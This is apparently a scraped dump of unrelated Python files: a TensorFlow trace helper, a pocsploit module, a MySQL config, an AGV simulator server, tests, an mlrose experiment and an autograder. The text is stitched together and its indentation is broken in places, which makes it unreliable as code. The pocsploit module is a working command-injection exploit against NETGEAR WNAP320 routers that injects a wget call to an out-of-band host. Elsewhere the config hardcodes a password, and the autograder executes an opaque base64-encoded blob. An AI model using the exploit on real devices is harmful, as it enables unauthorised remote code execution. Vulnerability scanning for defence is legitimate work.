i.e., the collection of elements of the form a[i, i+offset].
If a has more than two dimensions, then the axes specified by
axis1 and axis2 are used to determine the 2-D sub-array whose diagonal is
summed.
Args:
tensor: A tensor.
offset: Offset of the diagonal from the main diagonal.
This argument is not supported in the TensorFlow
backend and an error will be raised if they are
specified.
axis1, axis2: Axis to be used as the first/second axis of the 2D
sub-arrays from which the diagonals should be taken.
Defaults to first/second axis.
These arguments are not supported in the TensorFlow
backend and an error will be raised if they are
specified.
Returns:
array_of_diagonals: The batched summed diagonals.
"""
if offset != 0:
      errstr = (f"offset = {offset} must be 0 (the default) "
f"with TensorFlow backend.")
raise NotImplementedError(errstr)
if axis1 == axis2:
raise ValueError(f"axis1 = {axis1} cannot equal axis2 = {axis2}")
N = len(tensor.shape)
if N > 25:
      raise ValueError(f"Currently only tensors with ndim <= 25 can be traced "
f"in the TensorFlow backend (yours was {N})")
if axis1 < 0:
axis1 = N+axis1
if axis2 < 0:
axis2 = N+axis2
inds = list(map(chr, range(98, 98+N)))
indsout = [i for n, i in enumerate(inds) if n not in (axis1, axis2)]
inds[axis1] = 'a'
inds[axis2] = 'a'
return tf.einsum(''.join(inds) + '->' +''.join(indsout), tensor)
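  # Example of the einsum built above (for reference): for a rank-4 tensor with the default
  # axis1=-2, axis2=-1, inds becomes ['b', 'c', 'a', 'a'], so the contraction string is
  # 'bcaa->bc', i.e. a batched trace over the last two axes.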
def abs(self, tensor: Tensor) -> Tensor:
"""
Returns the elementwise absolute value of tensor.
Args:
tensor: An input tensor.
Returns:
tensor: Its elementwise absolute value.
"""
return tf.math.abs(tensor)
def sign(self, tensor: Tensor) -> Tensor:
"""
Returns an elementwise tensor with entries
y[i] = 1, 0, -1 where tensor[i] > 0, == 0, and < 0 respectively.
For complex input the behaviour of this function may depend on the backend.
The TensorFlow version returns y[i] = x[i] / abs(x[i]).
Args:
tensor: The input tensor.
"""
return tf.math.sign(tensor)
| 37.27013
| 80
| 0.638233
|
71e8eaf78fc000dd5398fb58b7f810a6bc4b7f76
| 2,033
|
py
|
Python
|
modules/vulnerabilities/other/netgear-wnap320-rce.py
|
cckuailong/pocsploit
|
fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a
|
[
"MIT"
] | 106
|
2022-03-18T06:51:09.000Z
|
2022-03-31T19:11:41.000Z
|
modules/vulnerabilities/other/netgear-wnap320-rce.py
|
cckuailong/pocsploit
|
fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a
|
[
"MIT"
] | 5
|
2022-03-27T07:37:32.000Z
|
2022-03-31T13:56:11.000Z
|
modules/vulnerabilities/other/netgear-wnap320-rce.py
|
cckuailong/pocsploit
|
fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a
|
[
"MIT"
] | 30
|
2022-03-21T01:27:08.000Z
|
2022-03-31T12:28:01.000Z
|
import requests
from plugins.oob import verify_request, gen_oob_domain
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''NETGEAR WNAP320 Access Point - Remote Code Execution (Unauthenticated)''',
"description": '''vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device.''',
"severity": "critical",
"references": [
"https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["netgear", "rce", "oast", "router"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
oob_domain,flag = gen_oob_domain()
path = """/boardDataWW.php"""
method = "POST"
        data = """macAddress=112233445566%3Bwget+http%3A%2F%2F{oob_domain}%23&reginfo=0&writeData=Submit""".format(oob_domain=oob_domain)
headers = {'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if verify_request(type="dns", flag=flag):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
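# Illustrative invocation (the target URL is a documentation placeholder, not taken from
# this module):
#
#   result = poc("http://192.0.2.1:8080")
#   print(result.get("success"), result.get("payload"))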
| 28.633803
| 226
| 0.587801
|
36373d9c32e9bddccf8bd3513e1a8c409e6932b8
| 989
|
py
|
Python
|
config/env.py
|
WYL-BruceLong/webinfo-crawler
|
5f8a88a1b3f5c6da1c0276a3cac474d460c70b1c
|
[
"MIT"
] | 1
|
2019-07-18T09:24:56.000Z
|
2019-07-18T09:24:56.000Z
|
config/env.py
|
WYL-BruceLong/webinfo-crawler
|
5f8a88a1b3f5c6da1c0276a3cac474d460c70b1c
|
[
"MIT"
] | null | null | null |
config/env.py
|
WYL-BruceLong/webinfo-crawler
|
5f8a88a1b3f5c6da1c0276a3cac474d460c70b1c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# -*-: coding: utf-8 -*-
"""
:author: lubosson
:date: 2019-04-11
:desc:
"""
import logging as log
from config.settings import MysqlConfig
ENV = 'development'  # environment variable
class MysqlEnviron:
mapping = {
'development': MysqlConfig.get('development'),
'testing': MysqlConfig.get('testing'),
'production': MysqlConfig.get('production')
}
    CONFIG = mapping.get(ENV, mapping.get('development'))  # fall back to the development config dict, not the string 'development'
if not CONFIG:
log.error('no active environment')
exit(0)
@staticmethod
def host():
return MysqlEnviron.CONFIG.get('host', '127.0.0.1')
@staticmethod
def port():
return MysqlEnviron.CONFIG.get('port', 3306)
@staticmethod
def database():
return MysqlEnviron.CONFIG.get('db', 'geek')
@staticmethod
def username():
return MysqlEnviron.CONFIG.get('username', 'geek')
@staticmethod
def password():
return MysqlEnviron.CONFIG.get('password', 'Geek@123...')
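# Illustrative usage (a sketch; the DSN format is an assumption, not defined here):
#
#   dsn = "mysql://{}:{}@{}:{}/{}".format(
#       MysqlEnviron.username(), MysqlEnviron.password(),
#       MysqlEnviron.host(), MysqlEnviron.port(), MysqlEnviron.database())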
| 20.604167
| 65
| 0.618807
|
0f934c649aff8590efa819f86f4fa2eb860d2413
| 6,406
|
py
|
Python
|
openTCS-CommAdapter-HTTP/src/test/java/httpserver3.py
|
touchmii/OpenTCS-4
|
e3973bd72da63011369a1935de7303bf11bc2a1f
|
[
"MIT"
] | 21
|
2021-07-31T09:35:59.000Z
|
2022-03-25T18:23:45.000Z
|
openTCS-CommAdapter-HTTP/src/test/java/httpserver3.py
|
wmhui007/OpenTCS-4
|
768dc0aebf63b5ac79f869dabcb35f9ebfb4deee
|
[
"MIT"
] | 2
|
2021-01-21T12:39:47.000Z
|
2021-07-29T09:56:22.000Z
|
openTCS-CommAdapter-HTTP/src/test/java/httpserver3.py
|
wmhui007/OpenTCS-4
|
768dc0aebf63b5ac79f869dabcb35f9ebfb4deee
|
[
"MIT"
] | 17
|
2020-09-24T00:09:50.000Z
|
2021-07-07T12:20:41.000Z
|
#!/usr/bin/env python3
"""A simple HTTP server with REST and json for python 3.
addrecord takes utf8-encoded URL parameters
getrecord returns utf8-encoded json.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import argparse
import re
import cgi
import json
import threading
import asyncio
import time
from queue import Queue
from urllib import parse
from pymodbus.client.sync import ModbusSerialClient as ModbusClient
import serial
position = [0,0]
class LocalData(object):
records = {}
qu = Queue(100)
class HTTPRequestHandler(BaseHTTPRequestHandler):
def do_POST(self):
if re.search('/api/v1/addrecord/*', self.path):
ctype, pdict = cgi.parse_header(
self.headers.get('content-type'))
if ctype == 'application/json':
length = int(self.headers.get('content-length'))
rfile_str = self.rfile.read(length).decode('utf8')
data = parse.parse_qs(rfile_str, keep_blank_values=1)
record_id = self.path.split('/')[-1]
LocalData.records[record_id] = data
print("addrecord %s: %s" % (record_id, data))
# HTTP 200: ok
self.send_response(200)
else:
# HTTP 400: bad request
self.send_response(400, "Bad Request: must give data")
elif re.search('/v1/vehicle/sendpath', self.path):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
if ctype == 'application/json':
length = int(self.headers.get('content-length'))
rfile_str = self.rfile.read(length).decode('utf8')
data = parse.parse_qs(rfile_str, keep_blank_values=1)
record_id = self.path.split('/')[-1]
LocalData.records[record_id] = data
path = json.loads(rfile_str)
# global sim
# sim.add_path(path)
LocalData.qu.put(path)
print("addrecord %s: %s" % (record_id, data))
# HTTP 200: ok
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
data =json.dumps({"status":"ok"})
self.wfile.write(data.encode('utf8'))
else:
# HTTP 403: forbidden
self.send_response(403)
self.end_headers()
def do_GET(self):
if re.search('/api/v1/shutdown', self.path):
# Must shutdown in another thread or we'll hang
def kill_me_please():
self.server.shutdown()
threading.Thread(target=kill_me_please).start()
# Send out a 200 before we go
self.send_response(200)
elif re.search('/api/v1/getrecord/*', self.path):
record_id = self.path.split('/')[-1]
if record_id in LocalData.records:
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
# Return json, even though it came in as POST URL params
data = json.dumps(LocalData.records[record_id])
print("getrecord %s: %s" % (record_id, data))
self.wfile.write(data.encode('utf8'))
else:
self.send_response(404, 'Not Found: record does not exist')
elif re.search('/v1/vehicle/status', self.path):
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
data =json.dumps({"x":position[0],"y":position[1],"status":"idle","battery":50,"fork":"unload"})
self.wfile.write(data.encode('utf8'))
else:
self.send_response(403)
self.end_headers()
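# Example response from GET /v1/vehicle/status (the values shown are the module-level defaults):
#   {"x": 0, "y": 0, "status": "idle", "battery": 50, "fork": "unload"}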
current_position = [0,0]
class sim_vehicle:
def __init__(self, sim_time=0.1):
self.sim_time = sim_time
global current_position
self.target_position = [0,0]
self.position_queue = Queue(100)
def set_sim_time(self, new_sim_time):
self.sim_time = new_sim_time
def add_path(self, new_path):
for path_point in new_path:
self.position_queue.put(path_point)
def get_path(self):
# pass
return list(self.position_queue.queue)
async def start_simulate(self):
while True:
await asyncio.sleep(self.sim_time)
# print(",\n")
print(LocalData.qu.qsize())
if self.target_position != current_position:
if self.target_position[0] - current_position[0] > 10:
pass
async def get_pose():
while True:
await asyncio.sleep(0.2)
        # code that reads the positioning data from the serial port would go here
def main():
parser = argparse.ArgumentParser(description='HTTP Server')
parser.add_argument('port', type=int, help='Listening port for HTTP Server')
parser.add_argument('ip', help='HTTP Server IP')
args = parser.parse_args()
server = HTTPServer((args.ip, args.port), HTTPRequestHandler)
print('HTTP Server Running...........')
# server.serve_forever()
threading.Thread(target=server.serve_forever).start()
    # get_pose() loops forever, so run it in its own event loop on a daemon thread
    # instead of blocking here; the serial polling below can then still execute.
    threading.Thread(target=asyncio.run, args=(get_pose(),), daemon=True).start()
    sim = sim_vehicle()
pp = []
for i in range(10):
pp.append([i,i*2])
sim.add_path(pp)
print(sim.get_path())
    # Register 0x28: ranging/positioning enable. 0: no ranging, 1: single measurement,
    # 2: continuous measurement, 3: single automatic output, 4: continuous automatic output.
# client = ModbusClient(method='rtu', port='COM1', timeout=1, baudrate=115200)
# client.connect()
# client.write_register(0x28, 2)
    # pyserial opens the port on construction, so no explicit open() call is needed;
    # note that rebinding the name `serial` shadows the pyserial module, which is not used again.
    serial = serial.Serial("COM3", 115200)
    serial.write([0x01, 0x10, 0x00, 0x28, 0x00, 0x01, 0x02, 0x00, 0x02, 0x21, 0xB9])
    time.sleep(0.1)
    serial.read(serial.inWaiting())  # drain the reply to the enable command
while True:
        # Registers 0x2C (tag X coordinate) and 0x2D (tag Y coordinate).
        # Modbus client equivalents kept for reference:
        # request = client.read_input_registers(0x2C, 2)
        # request = client.read_holding_registers(0x2C, 2)
        serial.write([0x01, 0x03, 0x00, 0x2A, 0x00, 0x0D, 0xA5, 0xC7])
        time.sleep(0.1)
        rec_data = serial.read(serial.inWaiting())
        # Parse the Modbus RTU reply: 3 header bytes, registers start at 0x2A, so register
        # 0x2C sits at bytes 7:9 and 0x2D at bytes 9:11 (big-endian). This byte layout is an
        # assumption inferred from the read request above, not documented in this file.
        position[0] = int.from_bytes(rec_data[7:9], 'big')
        position[1] = int.from_bytes(rec_data[9:11], 'big')
        print('position: x {}, y {}'.format(position[0], position[1]))
        time.sleep(0.1)
if __name__ == '__main__':
main()
| 35.588889
| 108
| 0.592257
|
10a7892165cc7739c54e6985c3da25891e499a5b
| 1,466
|
py
|
Python
|
tests/func/test_utils.py
|
trappitsch/rttools
|
2aa56470020d1932b8abc2e1e84d211bbb2b2b5a
|
[
"MIT"
] | null | null | null |
tests/func/test_utils.py
|
trappitsch/rttools
|
2aa56470020d1932b8abc2e1e84d211bbb2b2b5a
|
[
"MIT"
] | null | null | null |
tests/func/test_utils.py
|
trappitsch/rttools
|
2aa56470020d1932b8abc2e1e84d211bbb2b2b5a
|
[
"MIT"
] | null | null | null |
"""Test for routiens in utils.py."""
import pytest
import numpy as np
import rttools.utils as utils
def test_kron_delta():
"""Ensure that 1 is returned if two indexes are the same, zero otherwise."""
assert utils.kron_delta(1, 1) == 1
assert utils.kron_delta(1, 2) == 0
def test_kron_delta_array():
"""Kronecker delta return for an array of indexes."""
in1 = np.array([1, 2, 3, 4])
in2 = np.array([1, 2, 4, 4])
in2alt = [1, 2, 4, 4] # as list
out_exp = np.array([1, 1, 0, 1])
np.testing.assert_equal(utils.kron_delta(in1, in2), out_exp)
np.testing.assert_equal(utils.kron_delta(in1, in2alt), out_exp)
def test_kron_delta_value_error():
"""Raise ValueError if shapes mismatch."""
arr1 = np.array([1, 2])
arr2 = np.array([1])
num = 3
with pytest.raises(ValueError) as err_info:
utils.kron_delta(num, arr1)
err_msg = err_info.value.args[0]
assert err_msg == "The inputs must have the same shape."
with pytest.raises(ValueError) as err_info:
utils.kron_delta(arr1, arr2)
err_msg = err_info.value.args[0]
assert err_msg == "The inputs must have the same shape."
@pytest.mark.parametrize(
"value", [[(3.0, 2), "3"], [(5.1264, 3), "5.126"], [(3.0102, 3), "3.01"]]
)
def test_reduce_decimal(value):
"""Test reducing numbers with parameterized values."""
num, prec = value[0]
expected = value[1]
assert utils.reduce_decimal(num, prec) == expected
| 29.918367
| 80
| 0.648022
|
185a7177c1c034c4525c9ab0892f2193bae500bf
| 7,051
|
py
|
Python
|
neural_net.py
|
crsavage0630/CS-7641-Assignment2
|
cff1d188046c23eb23221db0aa3d3d771d3d6b1c
|
[
"MIT"
] | null | null | null |
neural_net.py
|
crsavage0630/CS-7641-Assignment2
|
cff1d188046c23eb23221db0aa3d3d771d3d6b1c
|
[
"MIT"
] | null | null | null |
neural_net.py
|
crsavage0630/CS-7641-Assignment2
|
cff1d188046c23eb23221db0aa3d3d771d3d6b1c
|
[
"MIT"
] | null | null | null |
import mlrose_hiive as mlrose
import numpy as np
import pandas as pd
from time import perf_counter as clock  # time.clock was removed in Python 3.8; perf_counter is used as the timer here
import os
import argparse
import data.DataProcessors as dp
import seaborn as sns
import matplotlib.pyplot as plt
os.environ['seed'] = '45604'
randomSeed = 45604
verbose = True
from sklearn.metrics import accuracy_score, log_loss, f1_score, confusion_matrix, make_scorer, precision_score, mean_squared_error, plot_confusion_matrix, roc_auc_score, recall_score
def plot_results(data_dir, param_name, param_display):
directory="./"+data_dir+"/images/"
if not os.path.exists(directory):
os.makedirs(directory)
path1='./'+data_dir
path2= "./"+data_dir+"/images/"
# nn
ga = pd.read_csv(os.path.join(data_dir,'gatrain_performance.csv'))
sa = pd.read_csv(os.path.join(data_dir,'satrain_performance.csv'))
rh = pd.read_csv(os.path.join(data_dir,'rhtrain_performance.csv'))
gd = pd.read_csv(os.path.join(data_dir,'gdtrain_performance.csv'))
plt.close()
plt.figure()
plt.plot( ga['Iterations'], ga[param_name], label='Gen Alg')
plt.plot( sa['Iterations'], sa[param_name], label='Sim Ann')
plt.plot( rh['Iterations'], rh[param_name], label='Random Hill')
plt.plot( gd['Iterations'], gd[param_name], label='Grad Desc')
plt.legend(title="Algorithm", loc="best")
x_title = "Iterations"
y_title = param_display
plt.xlabel(x_title)
plt.ylabel(y_title)
plt.title("Customer Churn ANN Optimized by RO Algorithms (Train Performance)")
plt.savefig(os.path.join(directory,"train_"+param_name+".png"), format='png', dpi=200, bbox_inches = 'tight', pad_inches = 0)
ga = pd.read_csv(os.path.join(data_dir,'gatest_performance.csv'))
sa = pd.read_csv(os.path.join(data_dir,'satest_performance.csv'))
rh = pd.read_csv(os.path.join(data_dir,'rhtest_performance.csv'))
gd = pd.read_csv(os.path.join(data_dir,'gdtest_performance.csv'))
plt.close()
plt.figure()
plt.plot( ga['Iterations'], ga[param_name], label='Gen Alg')
plt.plot( sa['Iterations'], sa[param_name], label='Sim Ann')
plt.plot( rh['Iterations'], rh[param_name], label='Random Hill')
plt.plot( gd['Iterations'], gd[param_name], label='Grad Desc')
plt.legend(title="Algorithm", loc="best")
x_title = "Iterations"
y_title = param_display
plt.xlabel(x_title)
plt.ylabel(y_title)
plt.title("Customer Churn ANN Optimized by RO Algorithms (Test Performance)")
plt.savefig(os.path.join(directory,"test_"+param_name+".png"), format='png', dpi=200, bbox_inches = 'tight', pad_inches = 0)
def get_model(algorithm, max_iters):
activation = "relu"
print(algorithm)
print(max_iters)
if algorithm == "rh":
return mlrose.NeuralNetwork(hidden_nodes = [10], activation = activation, algorithm = 'random_hill_climb', \
bias = True, is_classifier = True, early_stopping = True, restarts = 5, max_attempts =10,
max_iters = max_iters, clip_max = 10, random_state = randomSeed)
if algorithm == "ga":
return mlrose.NeuralNetwork(hidden_nodes = [10], activation = activation, algorithm = 'genetic_alg', \
bias = True, is_classifier = True, early_stopping = True, max_attempts =10,
max_iters = max_iters, clip_max = 10, mutation_prob = .10, random_state = randomSeed)
if algorithm == "sa":
return mlrose.NeuralNetwork(hidden_nodes = [10], activation = activation, algorithm = 'simulated_annealing', \
bias = True, is_classifier = True, early_stopping = True, max_attempts =10,
max_iters = max_iters, clip_max = 10, schedule = mlrose.GeomDecay(), random_state = randomSeed)
if algorithm == "gd":
return mlrose.NeuralNetwork(hidden_nodes = [10], activation = activation, algorithm = 'gradient_descent', \
bias = True, is_classifier = True, early_stopping = True, max_attempts =10,
max_iters = max_iters, clip_max = 10, random_state = randomSeed)
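# Example (for reference): get_model("sa", 500) returns an mlrose NeuralNetwork with a single
# hidden layer of 10 relu nodes, trained by simulated annealing (GeomDecay schedule) for at
# most 500 iterations.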
def run_neural_net(algorithm):
fullData = dp.CustomerChurnModel()
fullData.prepare_data_for_training()
dfTrain = pd.DataFrame(columns=["Iterations","Accuracy","Precision","Recall","F1","ROC AUC","SquareError","TrainTime"])
dfTest = pd.DataFrame(columns=["Iterations","Accuracy","Precision","Recall","F1","ROC AUC","SquareError","TrainTime"])
iterations = np.geomspace(10, 5100, num=40, dtype=int)
index = 0
for iteration in iterations:
print(iteration)
nn_model1 = get_model(algorithm, iteration.item())
start = clock()
nn_model1.fit(fullData.trainX, fullData.trainY)
end = clock()
y_train_pred = nn_model1.predict(fullData.trainX)
y_train_accuracy = accuracy_score(fullData.trainY, y_train_pred)
print(y_train_accuracy)
y_test_pred = nn_model1.predict(fullData.testX)
y_test_accuracy = accuracy_score(fullData.testY, y_test_pred)
print(y_test_accuracy)
dfTrain.loc[index] = [iteration, accuracy_score(fullData.trainY, y_train_pred), precision_score(fullData.trainY, y_train_pred), recall_score(fullData.trainY, y_train_pred), f1_score(fullData.trainY, y_train_pred),roc_auc_score(fullData.trainY, y_train_pred),mean_squared_error(fullData.trainY, y_train_pred),end-start]
dfTest.loc[index] = [iteration, accuracy_score(fullData.testY, y_test_pred), precision_score(fullData.testY, y_test_pred), recall_score(fullData.testY, y_test_pred), f1_score(fullData.testY, y_test_pred),roc_auc_score(fullData.testY, y_test_pred),mean_squared_error(fullData.testY, y_test_pred),0]
index = index + 1
dfTrain.to_csv('{}{}'.format(algorithm,'train_performance.csv'))
dfTest.to_csv('{}{}'.format(algorithm,'test_performance.csv'))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Adding optional argument
parser.add_argument("-g", "--ga", help = "Run GA", default='y')
parser.add_argument("-s", "--sa", help = "Run SA", default='y')
parser.add_argument("-r", "--rh", help = "Run RH", default='y')
parser.add_argument("-d", "--gd", help = "Run Gradient Descent", default='y')
parser.add_argument("-p", "--plot", help = "Plot", default='y')
# Read arguments from command line
args = parser.parse_args()
print(args)
if (args.ga == 'y'):
run_neural_net("ga")
if (args.sa == 'y'):
run_neural_net("sa")
if (args.rh == 'y'):
run_neural_net("rh")
if (args.gd == 'y'):
run_neural_net("gd")
if (args.plot == 'y'):
plot_results(".","Accuracy","Accuracy")
plot_results(".","SquareError","Square Error")
plot_results(".","TrainTime","Training Time")
| 43.257669
| 326
| 0.649695
|
84041676d8f6716501aee64c8590d14471c44408
| 8,999
|
py
|
Python
|
CS/CSC384/A2/multiagent/submission_autograder.py
|
jerrysun103/uoft
|
6264583d27c7db94596d29c73804e6d9155de191
|
[
"MIT"
] | 2
|
2021-09-13T13:50:09.000Z
|
2021-12-14T07:03:07.000Z
|
CS/CSC384/A2/multiagent/submission_autograder.py
|
jerrysun103/uoft
|
6264583d27c7db94596d29c73804e6d9155de191
|
[
"MIT"
] | null | null | null |
CS/CSC384/A2/multiagent/submission_autograder.py
|
jerrysun103/uoft
|
6264583d27c7db94596d29c73804e6d9155de191
|
[
"MIT"
] | 2
|
2021-10-02T21:43:37.000Z
|
2022-01-08T17:46:14.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
from codecs import open
import os, ssl
if (not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None)):
ssl._create_default_https_context = ssl._create_unverified_context
"""
CS 188 Local Submission Autograder
Written by the CS 188 Staff
==============================================================================
_____ _ _
/ ____| | | |
| (___ | |_ ___ _ __ | |
\___ \| __/ _ \| '_ \| |
____) | || (_) | |_) |_|
|_____/ \__\___/| .__/(_)
| |
|_|
Modifying or tampering with this file is a violation of course policy.
If you're having trouble running the autograder, please contact the staff.
==============================================================================
"""
import bz2, base64
exec(bz2.decompress(base64.b64decode('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
